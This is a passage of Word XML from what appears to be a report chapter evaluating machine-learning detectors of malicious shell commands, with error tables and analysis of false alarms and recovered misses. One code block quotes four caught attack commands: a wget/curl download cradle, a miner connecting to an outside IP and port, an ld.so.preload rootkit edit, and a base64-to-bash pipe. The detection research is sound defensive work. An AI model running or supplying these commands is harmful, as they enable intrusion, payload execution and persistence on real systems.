                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.3% (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0% (0)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Dataset 2 benign source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>RF flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IF flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bash_history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1,026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.9%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (61)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2% (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>commandlinefu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>410</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.2% (13)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.9%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>On Dataset 1 the two models rank the benign sources almost identically —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash6k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>linlm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are hardest for both — yet they still share only 5 of 90</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>flagged rows. Same sources, different rows: the disagreement is at the level</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>of the individual command, not the corpus. That is precisely the condition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>under which combining two models helps, and it is invisible to the per-source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">error tables in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch8_1_error_forensics_noam.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2 shows the sharper effect. 82% of the Random Forest's false alarms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">land on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash_history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and 86% of the Isolation Forest's land on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>commandlinefu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — an inversion, given that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash_history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> supplies 71% of the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">benign rows and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>commandlinefu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only 29%. In rate terms the Isolation Forest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">fires on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>commandlinefu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> roughly fifteen times as often as on user history,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">though with only two </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash_history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> alarms that multiple is loosely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>determined; the composition figures are the robust version of the claim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Either way the direction is what the two training objectives predict.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>commandlinefu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a corpus of deliberately clever shell tricks, so it is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>genuinely far from the centre of "normal" — the Isolation Forest is not wrong</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>about that, it is answering the question it was asked. The Random Forest,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>trained against labels, has learned that unusual is not the same as malicious,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and its residual false alarms fall instead on everyday history that happens to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>share surface features with attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>What the Isolation Forest is actually for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2's eight IF-unique catches are the clearest evidence in this chapter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>of the anomaly detector's real value, because they are not marginal:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>echo "cd /tmp ; wget http://…/wget.sh || curl http://…/wget.sh ; chmod +x …"</w:t>
        <w:br/>
        <w:t>LC_ALL=C /home/admin/.dhpcd -o 76.132.177.92:4444 -t4 --safe -B &gt;/dev/null 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>echo "admin" | sh -c "sed '#/lib/libxml.so#d' /etc/ld.so.preload &gt; /etc/ld.so.preload"</w:t>
        <w:br/>
        <w:t>base64 --decode .threatstackcloudsecops | bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>A download cradle with a fallback fetcher, a hidden miner dialling a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">non-standard port, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ld.so.preload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rootkit persistence, and a base64 pipe into</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>a shell. These are far from any benign pattern in norm terms, which is what an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>isolation-based method measures — and they arrive on the operational corpus,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>not the curated one. Eight rows is not a case for deploying the model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">standalone. It is a case for consuming its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>score</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> alongside a supervised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>one, which is what Chapter 8.4's cascade does.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The cascade premise, measured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The motivating question for Chapter 8.4 is whether a stronger model recovers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>what the Random Forest misses. It substantially does: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20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>RF false negatives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>207</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>145</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>recovered by XGBoost-hybrid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>123 (59.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>83 (57.2%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>missed by both</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>newly missed by the hybrid (RF caught them)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Recovery is broad rather than concentrated. Against each source's share of the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dataset 1 miss set, the hybrid rescues 58 of 111 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>hacktricks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> misses (52%), 35</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">of 52 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>gtfobins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (67%), 26 of 39 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>atomic_red_team</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (67%), 3 of 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payloads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 of 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>slp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a similar fraction everywhere rather than one source carrying</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the result, so the character n-gram block is adding general lexical coverage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rather than rescuing a single style of payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>What the recovery costs differs by corpus, and the difference matters for 8.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>On Dataset 1 the hybrid runs 95 false positives against the Random Forest's 77,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>so there the extra recall is genuinely bought with false alarms. On Dataset 2 it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">runs 71 against 74 — fewer errors of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kinds, so the hybrid simply</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>dominates. The cascade therefore has something to justify on the curated corpus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and nothing to justify on the operational one, which is the reverse of the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>usual expectation and should be stated as such rather than averaged away.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The residual is the honest part. The 84 attacks both models miss on Dataset 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and the 62 on Dataset 2 are dominated by bare invocations carrying no argument</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
